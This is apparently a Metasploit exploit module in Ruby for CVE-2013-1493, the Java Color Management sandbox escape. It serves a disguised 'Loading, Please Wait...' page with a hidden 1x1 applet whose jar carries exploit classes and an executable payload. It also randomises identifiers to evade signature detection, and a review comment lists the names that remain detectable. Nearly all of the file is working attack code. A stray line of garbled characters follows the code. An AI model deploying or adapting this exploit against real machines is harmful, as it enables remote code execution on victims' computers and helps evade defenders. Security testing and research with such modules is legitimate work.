##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
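# Framework core plus the Rex library (HTTP server, random text, jar/zip helpers).
require 'msf/core'
require 'rex'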
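# Browser exploit for CVE-2013-1493 (Java CMM / Color Management classes).
#
# Serves a loader page with a 1x1 applet whose jar bundles the framework's
# Java payload loader together with four precompiled exploit classes shipped
# in data/exploits/cve-2013-1493. The victim must accept the click-to-play
# warning; the module does not bypass it.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # The applet is embedded with a plain <applet> tag, so BrowserAutopwn may
  # offer this module to clients that have JavaScript disabled.
  autopwn_info({ :javascript => false })

  # Module metadata. DefaultTarget 1 selects the Windows x86 native payload;
  # target 0 is the platform-independent Java payload.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the precompiled applet classes and randomises the name of the
  # entry-point class before the HTTP server starts.
  #
  # The replacement name is deliberately the same length as "Init": it is
  # spliced into compiled bytecode by plain string substitution, so a
  # different length would leave the class file malformed.
  def setup
    @init_class           = read_exploit_class('Init.class')
    @leak_class           = read_exploit_class('Leak.class')
    @buffered_image_class = read_exploit_class('MyBufferedImage.class')
    @color_space_class    = read_exploit_class('MyColorSpace.class')

    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)

    super
  end

  # HTTP request handler.
  #
  # - any URI ending in ".jar": the applet jar, rebuilt for every request
  # - the resource root ("/"): the loader page, but only if a payload can be
  #   produced for this client; otherwise a 404 rather than an applet that
  #   would never call back
  # - anything else: redirect to the resource root
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_applet_jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      unless regenerate_payload(cli)
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Minimal loader page embedding the applet at 1x1 pixels.
  #
  # The archive name is random per page load; on_request_uri serves the jar
  # for any path ending in ".jar", so the name only needs to be unique-looking.
  def generate_html
    archive = "#{rand_text_alpha(8)}.jar"
    [
      %Q|<html><head><title>Loading, Please Wait...</title></head>|,
      %Q|<body><center><p>Loading, Please Wait...</p></center>|,
      %Q|<applet archive="#{archive}" code="#{@init_class_name}.class" width="1" height="1">|,
      %Q|</applet></body></html>|
    ].join
  end

  private

  # Reads one precompiled class file from data/exploits/cve-2013-1493 in
  # binary mode so the bytecode is returned untouched.
  def read_exploit_class(name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', name)
    File.binread(path)
  end

  # Builds the applet jar: the encoded payload classes plus the four exploit
  # classes, then rewrites the "metasploit"/"Payload" identifiers the payload
  # classes ship with to same-length random strings (in both entry names and
  # entry bytes, same length constraint as the Init rename in setup).
  #
  # NOTE(review): only the entry-point class name is randomised; Leak,
  # MyBufferedImage and MyColorSpace keep their original names and bytes in
  # the jar, so those remain a stable signature for this module.
  def build_applet_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file("Leak.class", @leak_class)
    jar.add_file("MyBufferedImage.class", @buffered_image_class)
    jar.add_file("MyColorSpace.class", @color_space_class)

    metasploit_str = rand_text_alpha("metasploit".length)
    payload_str    = rand_text_alpha("payload".length)
    jar.entries.each do |entry|
      entry.name.gsub!("metasploit", metasploit_str)
      entry.name.gsub!("Payload", payload_str)
      entry.data = entry.data.gsub("metasploit", metasploit_str)
      entry.data = entry.data.gsub("Payload", payload_str)
    end
    jar.build_manifest

    jar
  end
end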
1 L) I- U* N: V4 M- p, r% @ |